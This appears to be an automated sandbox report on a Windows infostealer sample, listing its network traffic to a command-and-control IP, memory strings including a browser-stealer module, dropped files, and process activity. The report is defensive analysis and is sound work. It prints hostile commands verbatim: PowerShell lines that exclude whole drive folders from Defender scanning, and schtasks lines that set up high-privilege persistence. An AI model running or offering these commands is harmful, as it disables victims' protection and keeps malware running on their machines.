                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.177.239.66
                          Source: unknownHTTP traffic detected: POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 185.177.239.66Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1788927246.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000001.00000002.1900716755.0000026100227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.000002023656E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DADD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD03707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849F157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B42C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F303F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: powershell.exe, 00000001.00000002.1900716755.0000026100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1942628864.00000202361C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1906560868.0000013580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1921237248.00000202DABB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1924984491.000001AD034F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1942796990.000002849EF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1935689556.00000227B40A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1936385377.0000026F301D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1920581928.000001DB55721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1899802364.0000018980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1920142698.000002AD24121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1936183069.000001E32E342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA72000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDA0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDB07000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAF4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000054.00000003.2651347076.00000241EDAE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                          Source: powershell.exe, 00000015.00000002.1936183069.000001E32E557000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDAC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                          Source: svchost.exe, 00000054.00000003.2651347076.00000241EDA72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: it0cT1Y6lg.57.dr, LwS2Gv7TDl.57.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWindow created: window name: CLIPBRDWNDCLASS
                          Source: powershell.exeProcess created: 44
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Windows\INF\.NET CLR Data\78fe9fe6f28b21Jump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9B890D680_2_00007FFD9B890D68
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA554080_2_00007FFD9BA55408
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA533F90_2_00007FFD9BA533F9
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA523F50_2_00007FFD9BA523F5
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA549B00_2_00007FFD9BA549B0
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA408FB0_2_00007FFD9BA408FB
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA5412A0_2_00007FFD9BA5412A
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA538280_2_00007FFD9BA53828
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA53EB00_2_00007FFD9BA53EB0
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA525A80_2_00007FFD9BA525A8
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeCode function: 0_2_00007FFD9BA534D30_2_00007FFD9BA534D3
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeCode function: 52_2_00007FFD9B8B0D6852_2_00007FFD9B8B0D68
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AfaiVEic.log 3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                          Source: 3XtEci4Mmo.exe, 00000000.00000000.1677601667.00000000003F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1898628878.000000001B649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1846719384.0000000013CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1846719384.0000000013CEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1788307657.0000000002480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exe, 00000000.00000002.1893468397.000000001B3F2000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 3XtEci4Mmo.exe
                          Source: 3XtEci4Mmo.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.csCryptographic APIs: 'CreateDecryptor'
                          Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.csCryptographic APIs: 'CreateDecryptor'
                          Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.csCryptographic APIs: 'CreateDecryptor'
                          Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@106/209@0/2
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\Desktop\OlTNIjCM.logJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8484:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8588:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeMutant created: \Sessions\1\BaseNamedObjects\Local\f56d71433bb0e2fb950c932b49352e3f9208d708a9a063f95da637203ff919b0
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile created: C:\Users\user\AppData\Local\Temp\2zH73PFp52Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
                          Source: 3XtEci4Mmo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 3XtEci4Mmo.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Wsj6fACaid.57.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: 3XtEci4Mmo.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile read: C:\Users\user\Desktop\3XtEci4Mmo.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\3XtEci4Mmo.exe "C:\Users\user\Desktop\3XtEci4Mmo.exe"
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 9 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f
